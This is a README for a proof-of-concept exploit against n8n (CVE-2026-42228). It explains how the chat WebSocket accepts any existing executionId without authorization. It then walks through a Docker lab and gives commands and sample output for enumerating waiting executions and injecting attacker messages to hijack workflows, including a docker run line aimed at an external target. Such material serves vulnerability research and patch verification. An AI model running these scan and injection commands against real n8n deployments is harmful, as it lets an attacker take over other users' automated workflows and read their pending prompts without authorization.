## https://sploitus.com/exploit?id=95180999-EAA8-5BFD-99D8-C103E549077A
# GHSA-f77h-j2v7-g6mw โ n8n Unauthenticated Chat Execution Hijacking
**CVE:** CVE-2026-42228
**Severity:** High
**Affected:** n8n < 1.123.32
**Fixed in:** n8n 1.123.32 / 2.17.4 / 2.18.1
---
## Vulnerability Summary
`chat-service.ts :: startSession()` accepts an `executionId` from the WebSocket
query string and only checks that the execution exists in the database. It never
verifies the caller is authorised to access that execution.
An unauthenticated attacker who knows (or can enumerate) a valid numeric
execution ID for an execution in the **waiting** state can:
1. Connect to the `/chat` WebSocket without credentials.
2. Receive the pending prompt being shown to a legitimate user.
3. Inject arbitrary chat input that resumes โ and hijacks โ the workflow.
**Pre-requisites:**
- A public Hosted Chat workflow with Authentication = None is active.
- At least one execution is currently in the `waiting` state.
- The attacker can guess or enumerate the numeric execution ID (sequential integers).
---
## Lab Setup
### Requirements
- Docker โฅ 24 with Compose v2
- Port **5678** free on localhost
### One-command setup
```bash
chmod +x exploit.sh
./exploit.sh setup
```
This pulls `n8nio/n8n:1.123.22` (last affected release), builds the attacker
image, and starts the vulnerable target at `http://localhost:5678`.
---
## End-to-End Exploit Walkthrough
### 1. Configure the vulnerable target
1. Open `http://localhost:5678` and complete the setup wizard (any credentials).
2. Create a new workflow.
3. Add a **Chat Trigger** node โ set **Authentication = None**.
4. Add a **Wait** node (or any node that pauses for user input) after the trigger.
5. **Activate** the workflow.
### 2. Trigger a waiting execution
Open the public Chat URL shown in the Chat Trigger node and send a message.
The execution will enter the **waiting** state, paused for the next chat reply.
### 3. Scan for waiting executions (unauthenticated)
```bash
./exploit.sh scan
# or specify a range:
./exploit.sh scan 1 500
```
Expected output when a vulnerable execution is found:
```
[+] WAITING execution found! exec_id=7
Server said: 'n8n|continue'
Server said: '{"action":"sendMessage","sessionId":"...","chatInput":"Hello"}'
[!!!] Hijack payload sent: '[CVE-2026-42228] hijacked by PoC'
```
### 4. Attack a known execution ID directly
```bash
./exploit.sh attack 7
# or with a custom payload:
./exploit.sh attack 7 "custom injected message"
```
### 5. Observe the hijack
Back in the n8n editor, the workflow resumes with the **attacker's** injected
message instead of the legitimate user's input.
---
## Manual Docker Commands
```bash
# Build the attacker image
docker build -t n8n-chat-hijack-poc .
# Scan (attaches to the shared lab network)
docker run --rm --network ghsa-f77h-j2v7-g6mw_lab \
n8n-chat-hijack-poc \
--target http://n8n-vuln:5678 \
--start-id 1 --end-id 200
# Attack a specific execution
docker run --rm --network ghsa-f77h-j2v7-g6mw_lab \
n8n-chat-hijack-poc \
--target http://n8n-vuln:5678 \
--exec-id 7 --inject "PWNED"
# Against an external target (no network flag needed)
docker run --rm n8n-chat-hijack-poc \
--target https://n8n.example.com \
--exec-id 42 --inject "PWNED"
```
---
## Cleanup
```bash
./exploit.sh clean
```
Stops containers and removes volumes (including the SQLite database).
---
## Files
| File | Description |
|---|---|
| `poc_GHSA-f77h-j2v7-g6mw.py` | Standalone Python PoC |
| `Dockerfile` | Attacker container image |
| `docker-compose.yml` | Full lab: vulnerable n8n + attacker |
| `exploit.sh` | Helper script for common operations |
---
## References
- [GHSA-f77h-j2v7-g6mw](https://github.com/advisories/GHSA-f77h-j2v7-g6mw)
- [n8n release 1.123.32 changelog](https://github.com/n8n-io/n8n/releases/tag/n8n%401.123.32)